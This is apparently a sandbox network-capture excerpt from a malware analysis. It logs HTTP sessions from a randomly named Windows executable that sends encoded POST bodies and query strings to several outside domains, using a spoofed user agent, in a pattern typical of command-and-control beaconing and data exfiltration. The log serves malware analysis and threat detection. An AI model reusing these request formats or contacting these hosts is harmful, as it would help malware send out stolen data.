24	192.168.2.5	50000	199.59.243.228	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:35.382718086 CET	583	OUT	GET /8efo/?V8=T2NGoo7Qxcyqrqz3MX03hpQWSivm/Bj7gd/lPuHNqm/993Y45l+K5XkRQc/91P+Wf5o+Fy5PkbYLO4eQBkWEWabH/6z+kfBygbxby0fAgVFPJA+Djx5wnWVAkFd+F7WzDg==&Bb6h7=gBiPvnrHa HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.marketyemen.holdings Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:43:35.832009077 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 15:43:35 GMT content-type: text/html; charset=utf-8 content-length: 1518 x-request-id: c6c80a1a-896a-4fd0-9f98-b3303fdc46fa cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QmW3OxoNmgUbOjUP+UzrFo7yEZSAC+7HM+fmy2AJKK9ajuWY5TyWi9KyCfaRxQPvP2QNYdeo8C5IPNGHdmoQMw== set-cookie: parking_session=c6c80a1a-896a-4fd0-9f98-b3303fdc46fa; expires=Fri, 10 Jan 2025 15:58:35 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 6d 57 33 4f 78 6f 4e 6d 67 55 62 4f 6a 55 50 2b 55 7a 72 46 6f 37 79 45 5a 53 41 43 2b 37 48 4d 2b 66 6d 79 32 41 4a 4b 4b 39 61 6a 75 57 59 35 54 79 57 69 39 4b 79 43 66 61 52 78 51 50 76 50 32 51 4e 59 64 65 6f 38 43 35 49 50 4e 47 48 64 6d 6f 51 4d 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QmW3OxoNmgUbOjUP+UzrFo7yEZSAC+7HM+fmy2AJKK9ajuWY5TyWi9KyCfaRxQPvP2QNYdeo8C5IPNGHdmoQMw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 16:43:35.832027912 CET	971	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZjODBhMWEtODk2YS00ZmQwLTlmOTgtYjMzMDNmZGM0NmZhIiwicGFnZV90aW1lIjoxNzM2NTIzOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50001	208.91.197.27	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:41.124835014 CET	842	OUT	POST /0pui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.deacapalla.online Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.deacapalla.online Referer: http://www.deacapalla.online/0pui/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 78 47 56 37 5a 41 55 52 36 48 67 6d 48 33 66 46 52 36 68 69 4c 31 35 62 35 50 62 6a 42 6f 63 75 5a 56 61 68 54 43 73 65 71 77 76 57 44 5a 32 49 46 47 57 5a 56 74 59 6b 74 6e 65 78 34 4a 39 46 30 37 75 55 42 72 39 34 30 59 54 2f 78 79 6f 52 79 4d 79 33 52 57 55 31 61 36 50 6c 6c 72 65 77 6e 4d 6c 51 46 74 55 75 76 56 70 61 39 6b 31 43 74 6e 32 6b 41 36 32 4d 65 35 44 66 45 6c 73 77 59 38 74 64 50 78 51 47 6e 47 75 54 79 41 34 76 65 73 73 70 77 41 53 48 53 6c 6d 51 74 62 50 73 50 72 2b 4d 67 6d 37 54 44 74 2b 61 38 4f 33 39 62 6f 4d 5a 68 78 68 4e 47 73 74 77 67 4d 70 38 4e 64 6d 37 48 64 6f 3d Data Ascii: V8=xGV7ZAUR6HgmH3fFR6hiL15b5PbjBocuZVahTCseqwvWDZ2IFGWZVtYktnex4J9F07uUBr940YT/xyoRyMy3RWU1a6PllrewnMlQFtUuvVpa9k1Ctn2kA62Me5DfElswY8tdPxQGnGuTyA4vesspwASHSlmQtbPsPr+Mgm7TDt+a8O39boMZhxhNGstwgMp8Ndm7Hdo=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50002	208.91.197.27	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:43.675221920 CET	862	OUT	POST /0pui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.deacapalla.online Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.deacapalla.online Referer: http://www.deacapalla.online/0pui/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 78 47 56 37 5a 41 55 52 36 48 67 6d 48 55 48 46 57 70 5a 69 4d 56 35 61 38 50 62 6a 49 49 64 47 5a 56 65 68 54 48 49 77 74 43 4c 57 44 34 47 49 4c 6e 57 5a 53 74 59 6b 6d 48 65 77 33 70 39 4f 30 37 69 36 42 71 42 34 30 59 58 2f 78 79 59 52 79 66 61 77 54 47 55 67 58 61 50 6e 68 72 65 77 6e 4d 6c 51 46 74 6f 51 76 56 68 61 39 58 74 43 73 46 4f 72 47 4b 32 50 4a 4a 44 66 4a 46 74 33 59 38 74 2f 50 30 35 70 6e 45 57 54 79 46 38 76 64 39 73 75 2b 41 54 4f 50 31 6e 46 75 70 71 41 50 64 36 53 6a 6d 75 51 56 76 47 79 35 34 47 58 42 4b 45 78 79 52 4e 31 57 2f 6c 48 78 38 49 56 58 2b 32 4c 5a 4b 2f 67 4c 71 32 55 59 5a 4d 75 4f 79 4f 39 77 50 64 31 44 48 53 6e Data Ascii: V8=xGV7ZAUR6HgmHUHFWpZiMV5a8PbjIIdGZVehTHIwtCLWD4GILnWZStYkmHew3p9O07i6BqB40YX/xyYRyfawTGUgXaPnhrewnMlQFtoQvVha9XtCsFOrGK2PJJDfJFt3Y8t/P05pnEWTyF8vd9su+ATOP1nFupqAPd6SjmuQVvGy54GXBKExyRN1W/lHx8IVX+2LZK/gLq2UYZMuOyO9wPd1DHSn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50003	208.91.197.27	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:46.216811895 CET	1879	OUT	POST /0pui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.deacapalla.online Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.deacapalla.online Referer: http://www.deacapalla.online/0pui/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 78 47 56 37 5a 41 55 52 36 48 67 6d 48 55 48 46 57 70 5a 69 4d 56 35 61 38 50 62 6a 49 49 64 47 5a 56 65 68 54 48 49 77 74 43 44 57 44 4f 36 49 4c 41 43 5a 54 74 59 6b 34 33 65 39 33 70 39 54 30 37 36 2b 42 71 4e 47 30 61 66 2f 33 68 51 52 6a 65 61 77 4a 57 55 67 49 4b 50 6b 6c 72 66 74 6e 50 64 63 46 72 49 51 76 56 68 61 39 52 42 43 34 6e 32 72 64 4b 32 4d 65 35 44 74 45 6c 73 51 59 38 6b 64 50 30 30 57 6e 31 32 54 79 6c 73 76 62 50 55 75 68 51 54 4d 63 46 6d 47 75 70 57 66 50 64 4f 65 6a 6c 79 75 56 73 57 79 35 38 50 78 51 4b 55 77 76 68 55 51 47 74 30 6d 70 4a 6b 30 5a 76 71 44 5a 71 6a 59 55 61 53 36 59 4a 31 32 46 51 43 32 76 4b 5a 59 53 52 76 45 58 36 6b 65 6a 30 30 77 41 69 43 4b 74 6b 37 54 65 6e 4f 54 56 6c 59 79 59 4b 65 39 4d 52 6b 78 2f 4d 53 57 75 58 4e 45 6e 62 6d 61 36 73 4d 34 30 55 76 4e 6d 68 4b 41 4b 4b 71 6a 6e 4b 73 48 70 62 52 49 37 43 4d 6a 71 59 6e 75 75 39 57 4b 54 69 71 48 61 42 36 41 33 32 48 49 65 72 33 31 78 4f 32 37 70 75 35 71 6e 4e 68 51 6b 78 53 2f 47 75 5a [TRUNCATED] Data Ascii: V8=xGV7ZAUR6HgmHUHFWpZiMV5a8PbjIIdGZVehTHIwtCDWDO6ILACZTtYk43e93p9T076+BqNG0af/3hQRjeawJWUgIKPklrftnPdcFrIQvVha9RBC4n2rdK2Me5DtElsQY8kdP00Wn12TylsvbPUuhQTMcFmGupWfPdOejlyuVsWy58PxQKUwvhUQGt0mpJk0ZvqDZqjYUaS6YJ12FQC2vKZYSRvEX6kej00wAiCKtk7TenOTVlYyYKe9MRkx/MSWuXNEnbma6sM40UvNmhKAKKqjnKsHpbRI7CMjqYnuu9WKTiqHaB6A32HIer31xO27pu5qnNhQkxS/GuZSAl3zSy1dunjSLRejJP1ZfbSLBVxBD3dvPYuPu5+u1mhDUzchRqmodfguvsvd3eXAE2BeKFdJL/eNDqDv+FH8Hzh+40r5EvgeSj/ePzYZ7Bs89FnHB8RiiuOAXmSBhN5WR/NTPdQGCnH1UD5+ZNdF9SekUpl0W4H5pxXnqklYVcvwbbDIsbrmljvIWdKn8VlTFt+oHvPAmeo78dw8vnUD+CUqzzhM1gjPm54qzw6EX86TOqGf0l/zi1/Fq0DRqozh3mACAJbzKpaFJypM18v8ol7hVYEHjZb/ikyifXUnJkcJ2OgidBFXBxG9jWXuaZkWu0dAnN3mJhkAUo+6QomQULx9hdq/NKKuLKn+d8zUW3gNuNHGr3RBzBspTCbuvi4F0XJqql9t1x8oxUpVfbz7gvWL9WB4DZ5VRFlUM7NBal4B5RRT2/nM6rdAmskYUK+09iFWIEX+UgqKcJsI3kCkmOGsXFpScZ/f/eo9Dzoor56A5c5dfMcgPqlDcieU9YgIFbwGrneKaQLIGa8PJKgvEudnQbaL6Z+qzRwDoePMxF92bbCLmL/ZJYLX1KD+qqg/Z0IidyEC+SIdAMGQ8nqHbLHZXso6hu32EIHbEMSJoOlA6n8P79wzoEpqkFdveZotUG2sWJmOT8be6Uwu5dCpDkwv25Ij3ettZ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50004	208.91.197.27	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:48.758433104 CET	580	OUT	GET /0pui/?V8=8E9ba00UjFo7PU/eEqgVWkIK94OcHqokbV3+SylgnD70KIDAP1aAQbV/7FCow/l5youCP7Vx0oTyvxMws++GcEtPIIait+3tzbwSXdRUlhYH624U7nSdIoyPDL7sOl16Zw==&Bb6h7=gBiPvnrHa HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.deacapalla.online Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:43:49.757118940 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:43:48 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=908vr484069428992413846; expires=Wed, 09-Jan-2030 15:43:49 GMT; Max-Age=157680000; path=/; domain=www.deacapalla.online; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_DviVGobIRUXJpz5tveeqEuvUdv+VV8h8hPgtTTvR53dDRf8+22YWU39avJwY8EQ12uV9iYoSBaSIOiUMOGSPfg== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 37 63 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 Data Ascii: 7c69<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net
Jan 10, 2025 16:43:49.757150888 CET	110	IN	Data Raw: 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e Data Ascii: "> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppl
Jan 10, 2025 16:43:49.757311106 CET	1236	IN	Data Raw: 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c Data Ascii: iesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" i
Jan 10, 2025 16:43:49.757329941 CET	224	IN	Data Raw: 29 7b 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d Data Ascii: ){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.inde
Jan 10, 2025 16:43:49.757340908 CET	1236	IN	Data Raw: 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 2b 38 2c 32 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 65 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 65 2e 73 75 Data Ascii: xOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length
Jan 10, 2025 16:43:49.757356882 CET	1236	IN	Data Raw: 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 65 7d 7d 69 66 28 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 21 3d 2d 31 29 7b 77 3d 77 2e 73 75 62 73 74 72 28 30 2c 77 2e 69 6e 64 65 78 4f 66 28 Data Ascii: h.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.create
Jan 10, 2025 16:43:49.757369995 CET	1236	IN	Data Raw: 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 70 61 6e 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 69 6e 73 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c Data Ascii: th==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".mi
Jan 10, 2025 16:43:49.757383108 CET	360	IN	Data Raw: 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 65 6c 73 65 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 77 69 6e 64 6f 77 2e 63 Data Ascii: bute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=document.cookie;var f="";var d=0;while(b!=""&&d<100){d++;while(b.substr(0,1)==" "){b=b.substr(1,b.length)}va
Jan 10, 2025 16:43:49.801924944 CET	1236	IN	Data Raw: 63 3d 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 Data Ascii: c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a\|\|[];if(!a.length){return __cmp.a}else{if(a[0]==="ping
Jan 10, 2025 16:43:49.801944017 CET	1236	IN	Data Raw: 70 70 2e 6c 61 73 74 49 64 3b 5f 5f 67 70 70 2e 65 2e 70 75 73 68 28 7b 69 64 3a 63 2c 63 61 6c 6c 62 61 63 6b 3a 66 7d 29 3b 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 67 69 73 74 65 72 65 64 22 2c 6c 69 Data Ascii: pp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e\|\|[];for(var d=0;d<__gpp.e.length;d++){if(__gp
Jan 10, 2025 16:43:49.801956892 CET	1236	IN	Data Raw: 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 74 63 66 61 70 69 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e Data Ascii: (typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50005	136.243.64.147	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:55.045595884 CET	854	OUT	POST /tw42/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.100millionjobs.africa Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/tw42/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6f 72 42 68 77 7a 58 42 61 32 69 69 53 6c 31 65 4d 33 76 56 53 38 79 54 4d 59 37 2b 4c 73 62 55 5a 74 30 41 34 43 61 56 2b 68 4d 68 39 74 54 4a 2b 7a 2f 64 42 77 78 66 44 68 49 55 6b 74 2b 43 37 69 39 79 6d 32 5a 43 30 53 34 6d 57 56 5a 61 42 4f 67 31 52 39 52 70 4c 6a 69 45 77 6f 41 6b 32 37 73 30 43 30 30 2f 57 34 53 64 42 56 37 75 4a 59 72 37 71 52 35 41 62 35 71 33 44 32 62 59 31 41 6a 35 57 5a 4e 74 78 2f 55 32 33 46 79 52 73 7a 39 46 6d 63 54 43 68 62 49 30 68 32 4c 58 64 44 63 66 4c 6d 33 72 75 4e 53 77 37 4c 6d 59 63 5a 4d 49 41 57 70 69 46 79 34 59 31 64 35 50 63 4a 61 4b 44 56 51 3d Data Ascii: V8=orBhwzXBa2iiSl1eM3vVS8yTMY7+LsbUZt0A4CaV+hMh9tTJ+z/dBwxfDhIUkt+C7i9ym2ZC0S4mWVZaBOg1R9RpLjiEwoAk27s0C00/W4SdBV7uJYr7qR5Ab5q3D2bY1Aj5WZNtx/U23FyRsz9FmcTChbI0h2LXdDcfLm3ruNSw7LmYcZMIAWpiFy4Y1d5PcJaKDVQ=
Jan 10, 2025 16:43:55.713295937 CET	493	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 15:43:55 GMT Server: Apache Location: http://maximumgroup.co.za/tw42/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 74 77 34 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/tw42/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50006	136.243.64.147	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

